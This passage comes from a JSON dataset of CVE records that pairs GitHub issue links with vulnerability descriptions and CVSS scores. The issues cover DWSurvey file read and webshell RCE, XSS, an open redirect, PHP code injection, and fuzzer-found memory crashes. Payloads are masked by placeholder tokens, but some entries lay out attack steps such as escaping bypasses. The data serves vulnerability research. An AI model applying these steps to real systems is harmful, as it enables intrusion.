  69707. },
  69708. {
  69709. "CVE_ID": "CVE-2021-39384",
  69710. "Issue_Url_old": "https://github.com/wkeyuan/DWSurvey/issues/80",
  69711. "Issue_Url_new": "https://github.com/wkeyuan/dwsurvey/issues/80",
  69712. "Repo_new": "wkeyuan/dwsurvey",
  69713. "Issue_Created_At": "2021-08-16T02:45:58Z",
  69714. "description": "There are arbitrary file read vulnerabilities and a back end (admin panel) RCE vulnerability. In the latest version of dwsurvey oss NUMBERTAG there is an APITAG request forward. Since the same request object and response object are shared before and after forwarding, the forwarded response is written into a byte array buffer in memory, and finally written to a file in the printstream function. Because APITAG forwards between internal resources, an attacker can request internal sensitive files on the server, such as / WEB INF / FILETAG , giving an arbitrary file read by writing the forwarded content to a file and then fetching it; in addition, combined with the back end file upload, this leads to RCE. The request forward is in the server method in the PATHTAG file FILETAG Because of the bytearrayoutputstream, the forwarded response is kept in the byte array buffer in memory. The flushdo function is passed in FILETAG Here it is converted to a string and assigned to the document variable FILETAG It is passed into the printstream function FILETAG savepath and filename are concatenated to form the target file, and the response content is finally written to that file. The savepath and filename variables can also be controlled, as shown above FILETAG payload: URLTAG The FILETAG file is written into the web root directory and can then be accessed FILETAG Database configuration file read successfully: FILETAG A file upload feature in the back end can also be used to obtain RCE: in the back end create a new questionnaire > Advanced Editor, upload an image file containing an embedded JSP webshell (a \"picture horse\"), and use Burp Suite to capture the request FILETAG FILETAG Visit FILETAG , and the JSP file is generated in the web root directory. Because the Jsoup.parse method escapes JSP tags, testing showed that wrapping the payload in the ' APITAG APITAG ' tag bypasses the escaping FILETAG So the uploaded image file content is: APITAG APITAG APITAG Visit URLTAG and the RCE succeeds: FILETAG",
  69715. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  69716. "severity": "CRITICAL",
  69717. "baseScore": 9.8,
  69718. "impactScore": 5.9,
  69719. "exploitabilityScore": 3.9
  69720. },
  69721. {
  69722. "CVE_ID": "CVE-2021-39390",
  69723. "Issue_Url_old": "https://github.com/partkeepr/PartKeepr/issues/1237",
  69724. "Issue_Url_new": "https://github.com/partkeepr/partkeepr/issues/1237",
  69725. "Repo_new": "partkeepr/partkeepr",
  69726. "Issue_Created_At": "2022-02-22T12:47:49Z",
  69727. "description": "Stored XSS in APITAG Description Stored XSS in APITAG NUMBERTAG Edit section in multiple api endpoints via name parameter Reproduction Steps Browsing to Edit tab, select project and add new project. There, insert the following payload ERRORTAG in name field. APITAG The request performed is the following, being name the vulnerable parameter : ERRORTAG Then, when another user goes to edit tab and clicks the project with the payload as name, XSS triggers APITAG Apart from projects , the following tabs are also vulnerable : footprints , manufacturers , storage locations , distributors , part measurement units , units and batch jobs System Information APITAG Version NUMBERTAG Operating System: APITAG Web Server: Apache PHP Version NUMBERTAG Database and version: Mysql Reproducible on the demo system: Yes",
  69728. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  69729. "severity": "MEDIUM",
  69730. "baseScore": 5.4,
  69731. "impactScore": 2.7,
  69732. "exploitabilityScore": 2.3
  69733. },
  69734. {
  69735. "CVE_ID": "CVE-2021-39391",
  69736. "Issue_Url_old": "https://github.com/beego/beego/issues/4727",
  69737. "Issue_Url_new": "https://github.com/beego/beego/issues/4727",
  69738. "Repo_new": "beego/beego",
  69739. "Issue_Created_At": "2021-08-15T12:28:51Z",
  69740. "description": "XSS in Admin Panel. When navigating to a page, the path is not sanitized in the APITAG statistics\" in the admin panel, leading to an XSS. For example, navigating to APITAG leads to an alert when viewed on the admin panel: FILETAG",
  69741. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69742. "severity": "MEDIUM",
  69743. "baseScore": 6.1,
  69744. "impactScore": 2.7,
  69745. "exploitabilityScore": 2.8
  69746. },
  69747. {
  69748. "CVE_ID": "CVE-2021-39416",
  69749. "Issue_Url_old": "https://github.com/remoteclinic/RemoteClinic/issues/17",
  69750. "Issue_Url_new": "https://github.com/remoteclinic/remoteclinic/issues/17",
  69751. "Repo_new": "remoteclinic/remoteclinic",
  69752. "Issue_Created_At": "2021-08-16T11:38:23Z",
  69753. "description": "Multiple Cross Site Scripting Vulnerabilities in Remote Clinic NUMBERTAG In Remote Clinic NUMBERTAG there are multiple Cross Site Scripting vulnerabilities via the Contact, Email, Weight, Profession, ref_contact, and address parameters in FILETAG are vulnerable due to the _POSTs not being sanitized properly for XSS despite being sent through the friendly function. In Remote Clinic NUMBERTAG there is Stored Cross Site Scripting and no sanitization for the gender, age, serial parameters when retrieved by _POST in FILETAG to be sent to the database. This is possible by changing the values in the dropdowns in the inspect menu. In Remote Clinic NUMBERTAG in FILETAG , the Contact, Email, Weight, Profession, ref_contact, and address parameters being edited are not sanitized for Cross Site Scripting when they are retrieved by _POST. In Remote APITAG NUMBERTAG in FILETAG , the serial, age, and gender dropdowns are able to be changed via the inspect menu In Remote Clinic NUMBERTAG in FILETAG , the Title, First Name, Last Name, Skype, and Address parameters sent by _POST to be put in the database, is unsanitized and prone to Cross Site Scripting (XSS) In Remote Clinic NUMBERTAG in FILETAG , most of the parameters being passed into the database are sanitized insufficiently. The parameters that allow Cross Site Scripting are portal_name, guardian_short_name, guardian_name, opening_time, closing_time, access_level NUMBERTAG access_level NUMBERTAG access_level NUMBERTAG access_level NUMBERTAG access_level NUMBERTAG currency, mobile_number, address, patient_contact, patient_address, and patient_email.",
  69754. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69755. "severity": "MEDIUM",
  69756. "baseScore": 6.1,
  69757. "impactScore": 2.7,
  69758. "exploitabilityScore": 2.8
  69759. },
  69760. {
  69761. "CVE_ID": "CVE-2021-39480",
  69762. "Issue_Url_old": "https://github.com/m4b/bingrep/issues/30",
  69763. "Issue_Url_new": "https://github.com/m4b/bingrep/issues/30",
  69764. "Repo_new": "m4b/bingrep",
  69765. "Issue_Created_At": "2021-08-09T12:42:31Z",
  69766. "description": "memory allocation of NUMBERTAG bytes failed FILETAG ERRORTAG",
  69767. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  69768. "severity": "HIGH",
  69769. "baseScore": 7.5,
  69770. "impactScore": 3.6,
  69771. "exploitabilityScore": 3.9
  69772. },
  69773. {
  69774. "CVE_ID": "CVE-2021-39491",
  69775. "Issue_Url_old": "https://github.com/yogeshojha/rengine/issues/460",
  69776. "Issue_Url_new": "https://github.com/yogeshojha/rengine/issues/460",
  69777. "Repo_new": "yogeshojha/rengine",
  69778. "Issue_Created_At": "2021-08-20T03:48:35Z",
  69779. "description": "FILETAG I have confirmed that this issue can be reproduced as described on a latest version/pull of APITAG yes Technical details Debian NUMBERTAG",
  69780. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  69781. "severity": "MEDIUM",
  69782. "baseScore": 5.4,
  69783. "impactScore": 2.7,
  69784. "exploitabilityScore": 2.3
  69785. },
  69786. {
  69787. "CVE_ID": "CVE-2021-39499",
  69788. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/18",
  69789. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/18",
  69790. "Repo_new": "weng-xianhu/eyoucms",
  69791. "Issue_Created_At": "2021-08-21T15:53:36Z",
  69792. "description": "Change email address in user's function leads to XSS. I and MENTIONTAG found an XSS vulnerability in a user function called APITAG when we audited your source code. The vulnerability occurs when we input a new email while injecting some trick to trigger XSS in the title param like: APITAG To trigger this bug, we did the following NUMBERTAG Access url: URLTAG APITAG NUMBERTAG Enter a valid email NUMBERTAG Click to Send ( APITAG in your language) button. And then the XSS is triggered. Solution: To fix this vulnerability, please validate input from the user into the title param",
  69793. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69794. "severity": "MEDIUM",
  69795. "baseScore": 6.1,
  69796. "impactScore": 2.7,
  69797. "exploitabilityScore": 2.8
  69798. },
  69799. {
  69800. "CVE_ID": "CVE-2021-39501",
  69801. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/17",
  69802. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/17",
  69803. "Repo_new": "weng-xianhu/eyoucms",
  69804. "Issue_Created_At": "2021-08-21T15:19:24Z",
  69805. "description": "There is an open redirect vulnerability in param \"referurl\" of the Logout function. Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: The Logout function accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. FILETAG APITAG Requests: CODETAG",
  69806. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  69807. "severity": "MEDIUM",
  69808. "baseScore": 6.1,
  69809. "impactScore": 2.7,
  69810. "exploitabilityScore": 2.8
  69811. },
  69812. {
  69813. "CVE_ID": "CVE-2021-39503",
  69814. "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/15",
  69815. "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/15",
  69816. "Repo_new": "gaozhifeng/phpmywind",
  69817. "Issue_Created_At": "2021-08-22T08:31:32Z",
  69818. "description": "PHP Code Execution via create new site function in FILETAG . Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Submit date: PATHTAG Target: FILETAG Condition: Admin user Version NUMBERTAG Description: In APITAG function of FILETAG file call to APITAG function to append content when I create a new site to FILETAG file, because the input is filtered without \"<, >, ?, =, `,....\" the attacker can append ?> to close php syntax and add a new php function In FILETAG file FILETAG FILETAG APITAG function: FILETAG APITAG FILETAG In FILETAG file FILETAG Then back to .php files in /admin/ directory to execute code FILETAG Request CODETAG Response CODETAG",
  69819. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  69820. "severity": "HIGH",
  69821. "baseScore": 7.2,
  69822. "impactScore": 5.9,
  69823. "exploitabilityScore": 1.2
  69824. },
  69825. {
  69826. "CVE_ID": "CVE-2021-39514",
  69827. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/36",
  69828. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/36",
  69829. "Repo_new": "thorfdbg/libjpeg",
  69830. "Issue_Created_At": "2020-08-04T02:48:57Z",
  69831. "description": "A heap overflow in APITAG causes segment fault. System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  69832. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69833. "severity": "MEDIUM",
  69834. "baseScore": 6.5,
  69835. "impactScore": 3.6,
  69836. "exploitabilityScore": 2.8
  69837. },
  69838. {
  69839. "CVE_ID": "CVE-2021-39515",
  69840. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/37",
  69841. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/37",
  69842. "Repo_new": "thorfdbg/libjpeg",
  69843. "Issue_Created_At": "2020-08-04T12:51:56Z",
  69844. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  69845. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69846. "severity": "MEDIUM",
  69847. "baseScore": 6.5,
  69848. "impactScore": 3.6,
  69849. "exploitabilityScore": 2.8
  69850. },
  69851. {
  69852. "CVE_ID": "CVE-2021-39516",
  69853. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/42",
  69854. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/42",
  69855. "Repo_new": "thorfdbg/libjpeg",
  69856. "Issue_Created_At": "2020-08-13T04:27:58Z",
  69857. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null APITAG output ERRORTAG POC FILETAG",
  69858. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69859. "severity": "MEDIUM",
  69860. "baseScore": 6.5,
  69861. "impactScore": 3.6,
  69862. "exploitabilityScore": 2.8
  69863. },
  69864. {
  69865. "CVE_ID": "CVE-2021-39517",
  69866. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/33",
  69867. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/33",
  69868. "Repo_new": "thorfdbg/libjpeg",
  69869. "Issue_Created_At": "2020-08-04T01:54:43Z",
  69870. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output ERRORTAG POC FILETAG",
  69871. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69872. "severity": "MEDIUM",
  69873. "baseScore": 6.5,
  69874. "impactScore": 3.6,
  69875. "exploitabilityScore": 2.8
  69876. },
  69877. {
  69878. "CVE_ID": "CVE-2021-39518",
  69879. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/35",
  69880. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/35",
  69881. "Repo_new": "thorfdbg/libjpeg",
  69882. "Issue_Created_At": "2020-08-04T02:45:44Z",
  69883. "description": "A heap overflow in APITAG causes segment fault. System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  69884. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69885. "severity": "MEDIUM",
  69886. "baseScore": 6.5,
  69887. "impactScore": 3.6,
  69888. "exploitabilityScore": 2.8
  69889. },
  69890. {
  69891. "CVE_ID": "CVE-2021-39519",
  69892. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/28",
  69893. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/28",
  69894. "Repo_new": "thorfdbg/libjpeg",
  69895. "Issue_Created_At": "2020-08-01T14:34:03Z",
  69896. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output ERRORTAG POC FILETAG",
  69897. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69898. "severity": "MEDIUM",
  69899. "baseScore": 6.5,
  69900. "impactScore": 3.6,
  69901. "exploitabilityScore": 2.8
  69902. },
  69903. {
  69904. "CVE_ID": "CVE-2021-39520",
  69905. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/34",
  69906. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/34",
  69907. "Repo_new": "thorfdbg/libjpeg",
  69908. "Issue_Created_At": "2020-08-04T02:30:41Z",
  69909. "description": "Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), jpeg (latest master e NUMBERTAG URLTAG Command line ./jpeg oz h s NUMBERTAG APITAG /dev/null Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  69910. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69911. "severity": "MEDIUM",
  69912. "baseScore": 6.5,
  69913. "impactScore": 3.6,
  69914. "exploitabilityScore": 2.8
  69915. },
  69916. {
  69917. "CVE_ID": "CVE-2021-39521",
  69918. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/262",
  69919. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/262",
  69920. "Repo_new": "libredwg/libredwg",
  69921. "Issue_Created_At": "2020-08-03T14:19:33Z",
  69922. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwg2dxf (latest master bacd NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG b m ./SEGV bit_read_BB bits NUMBERTAG o /dev/null Output APITAG APITAG output ERRORTAG POC FILETAG",
  69923. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69924. "severity": "MEDIUM",
  69925. "baseScore": 6.5,
  69926. "impactScore": 3.6,
  69927. "exploitabilityScore": 2.8
  69928. },
  69929. {
  69930. "CVE_ID": "CVE-2021-39522",
  69931. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/255",
  69932. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/255",
  69933. "Repo_new": "libredwg/libredwg",
  69934. "Issue_Created_At": "2020-07-31T12:13:06Z",
  69935. "description": "A heap buffer overflow in bit_wcs2len at APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwg2dxf (latest master aee0ea URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG b m ./heap buffer overflow bit_wcs2len bits NUMBERTAG o /dev/null APITAG output ERRORTAG POC FILETAG",
  69936. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  69937. "severity": "HIGH",
  69938. "baseScore": 8.8,
  69939. "impactScore": 5.9,
  69940. "exploitabilityScore": 2.8
  69941. },
  69942. {
  69943. "CVE_ID": "CVE-2021-39523",
  69944. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/251",
  69945. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/251",
  69946. "Repo_new": "libredwg/libredwg",
  69947. "Issue_Created_At": "2020-07-31T08:53:01Z",
  69948. "description": "A Segmentation fault error in check_POLYLINE_handles at APITAG System info: Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwg2dxf (latest master aee0ea URLTAG Command line PATHTAG b m ./SEGV check_POLYLINE_handles decode NUMBERTAG o /dev/null Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  69949. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  69950. "severity": "MEDIUM",
  69951. "baseScore": 6.5,
  69952. "impactScore": 3.6,
  69953. "exploitabilityScore": 2.8
  69954. },
  69955. {
  69956. "CVE_ID": "CVE-2021-39525",
  69957. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/261",
  69958. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/261",
  69959. "Repo_new": "libredwg/libredwg",
  69960. "Issue_Created_At": "2020-08-02T04:51:37Z",
  69961. "description": "A heap overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwg2dxf (latest master NUMBERTAG ef NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG b m ./SEGV check_POLYLINE_handles decode NUMBERTAG o /dev/null APITAG output ERRORTAG POC FILETAG",
  69962. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  69963. "severity": "HIGH",
  69964. "baseScore": 8.8,
  69965. "impactScore": 5.9,
  69966. "exploitabilityScore": 2.8
  69967. },
  69968. {
  69969. "CVE_ID": "CVE-2021-39527",
  69970. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/252",
  69971. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/252",
  69972. "Repo_new": "libredwg/libredwg",
  69973. "Issue_Created_At": "2020-07-31T08:58:03Z",
  69974. "description": "A heap buffer overflow in appinfo_private at APITAG System info: Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwg2dxf (latest master aee0ea URLTAG Command line PATHTAG b m ./heap buffer overflow appinfo_private decode NUMBERTAG o /dev/null APITAG output ERRORTAG POC FILETAG",
  69975. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  69976. "severity": "HIGH",
  69977. "baseScore": 8.8,
  69978. "impactScore": 5.9,
  69979. "exploitabilityScore": 2.8
  69980. },
  69981. {
  69982. "CVE_ID": "CVE-2021-39528",
  69983. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/256",
  69984. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/256",
  69985. "Repo_new": "libredwg/libredwg",
  69986. "Issue_Created_At": "2020-08-01T12:56:26Z",
  69987. "description": "A double free in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwgbmp (latest master NUMBERTAG b NUMBERTAG ed URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG ./double free dwg_free_MATERIAL_private APITAG NUMBERTAG FILETAG APITAG output ERRORTAG POC FILETAG",
  69988. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  69989. "severity": "HIGH",
  69990. "baseScore": 8.8,
  69991. "impactScore": 5.9,
  69992. "exploitabilityScore": 2.8
  69993. },
  69994. {
  69995. "CVE_ID": "CVE-2021-39530",
  69996. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/258",
  69997. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/258",
  69998. "Repo_new": "libredwg/libredwg",
  69999. "Issue_Created_At": "2020-08-02T02:25:59Z",
  70000. "description": "Incomplete fix for issues NUMBERTAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), dwgbmp (latest master NUMBERTAG ef NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG ./heap overflow bit_wcs2nlen bit NUMBERTAG APITAG output ERRORTAG POC FILETAG",
  70001. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70002. "severity": "HIGH",
  70003. "baseScore": 8.8,
  70004. "impactScore": 5.9,
  70005. "exploitabilityScore": 2.8
  70006. },
  70007. {
  70008. "CVE_ID": "CVE-2021-39531",
  70009. "Issue_Url_old": "https://github.com/Juniper/libslax/issues/53",
  70010. "Issue_Url_new": "https://github.com/juniper/libslax/issues/53",
  70011. "Repo_new": "juniper/libslax",
  70012. "Issue_Created_At": "2020-08-03T16:29:31Z",
  70013. "description": "A dynamic stack buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), slaxproc (latest master NUMBERTAG d NUMBERTAG a URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null x APITAG APITAG output ERRORTAG POC FILETAG",
  70014. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70015. "severity": "HIGH",
  70016. "baseScore": 8.8,
  70017. "impactScore": 5.9,
  70018. "exploitabilityScore": 2.8
  70019. },
  70020. {
  70021. "CVE_ID": "CVE-2021-39532",
  70022. "Issue_Url_old": "https://github.com/Juniper/libslax/issues/50",
  70023. "Issue_Url_new": "https://github.com/juniper/libslax/issues/50",
  70024. "Repo_new": "juniper/libslax",
  70025. "Issue_Created_At": "2020-08-02T14:01:43Z",
  70026. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), slaxproc (latest master NUMBERTAG d NUMBERTAG a URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null x APITAG APITAG output ERRORTAG POC FILETAG",
  70027. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70028. "severity": "MEDIUM",
  70029. "baseScore": 6.5,
  70030. "impactScore": 3.6,
  70031. "exploitabilityScore": 2.8
  70032. },
  70033. {
  70034. "CVE_ID": "CVE-2021-39533",
  70035. "Issue_Url_old": "https://github.com/Juniper/libslax/issues/51",
  70036. "Issue_Url_new": "https://github.com/juniper/libslax/issues/51",
  70037. "Repo_new": "juniper/libslax",
  70038. "Issue_Created_At": "2020-08-02T14:04:56Z",
  70039. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), slaxproc (latest master NUMBERTAG d NUMBERTAG a URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null x APITAG APITAG output ERRORTAG POC FILETAG",
  70040. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70041. "severity": "HIGH",
  70042. "baseScore": 8.8,
  70043. "impactScore": 5.9,
  70044. "exploitabilityScore": 2.8
  70045. },
  70046. {
  70047. "CVE_ID": "CVE-2021-39534",
  70048. "Issue_Url_old": "https://github.com/Juniper/libslax/issues/52",
  70049. "Issue_Url_new": "https://github.com/juniper/libslax/issues/52",
  70050. "Repo_new": "juniper/libslax",
  70051. "Issue_Created_At": "2020-08-02T14:07:30Z",
  70052. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), slaxproc (latest master NUMBERTAG d NUMBERTAG a URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null x APITAG APITAG output ERRORTAG POC FILETAG",
  70053. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70054. "severity": "HIGH",
  70055. "baseScore": 8.8,
  70056. "impactScore": 5.9,
  70057. "exploitabilityScore": 2.8
  70058. },
  70059. {
  70060. "CVE_ID": "CVE-2021-39535",
  70061. "Issue_Url_old": "https://github.com/hfp/libxsmm/issues/398",
  70062. "Issue_Url_new": "https://github.com/libxsmm/libxsmm/issues/398",
  70063. "Repo_new": "libxsmm/libxsmm",
  70064. "Issue_Created_At": "2020-08-02T12:35:38Z",
  70065. "description": "A Segmentation fault in libxsmm_gemm_generator. System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), libxsmm_gemm_generator (latest master ea NUMBERTAG d0 URLTAG Command line This input is the project testcases APITAG PATHTAG sparse foo.c foo NUMBERTAG hsw nopf DP ./SEGV gemm_generator Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  70066. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70067. "severity": "MEDIUM",
  70068. "baseScore": 6.5,
  70069. "impactScore": 3.6,
  70070. "exploitabilityScore": 2.8
  70071. },
  70072. {
  70073. "CVE_ID": "CVE-2021-39536",
  70074. "Issue_Url_old": "https://github.com/hfp/libxsmm/issues/402",
  70075. "Issue_Url_new": "https://github.com/libxsmm/libxsmm/issues/402",
  70076. "Repo_new": "libxsmm/libxsmm",
  70077. "Issue_Created_At": "2020-08-04T03:30:27Z",
  70078. "description": "A heap overflow causes corrupted heap size . System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), libxsmm_gemm_generator (latest master ea NUMBERTAG d0 URLTAG Command line PATHTAG sparse foo.c foo NUMBERTAG hsw nopf DP APITAG Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  70079. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  70080. "severity": "HIGH",
  70081. "baseScore": 8.8,
  70082. "impactScore": 5.9,
  70083. "exploitabilityScore": 2.8
  70084. },
  70085. {
  70086. "CVE_ID": "CVE-2021-39538",
  70087. "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/4",
  70088. "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/4",
  70089. "Repo_new": "leonhad/pdftools",
  70090. "Issue_Created_At": "2020-08-06T03:30:47Z",
  70091. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG pdftools (latest master NUMBERTAG fe NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG o /dev/null APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  70092. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70093. "severity": "MEDIUM",
  70094. "baseScore": 5.5,
  70095. "impactScore": 3.6,
  70096. "exploitabilityScore": 1.8
  70097. },
  70098. {
  70099. "CVE_ID": "CVE-2021-39539",
  70100. "Issue_Url_old": "https://github.com/leonhad/pdftools/issues/6",
  70101. "Issue_Url_new": "https://github.com/leonhad/pdftools/issues/6",
  70102. "Repo_new": "leonhad/pdftools",
  70103. "Issue_Created_At": "2020-08-06T04:47:08Z",
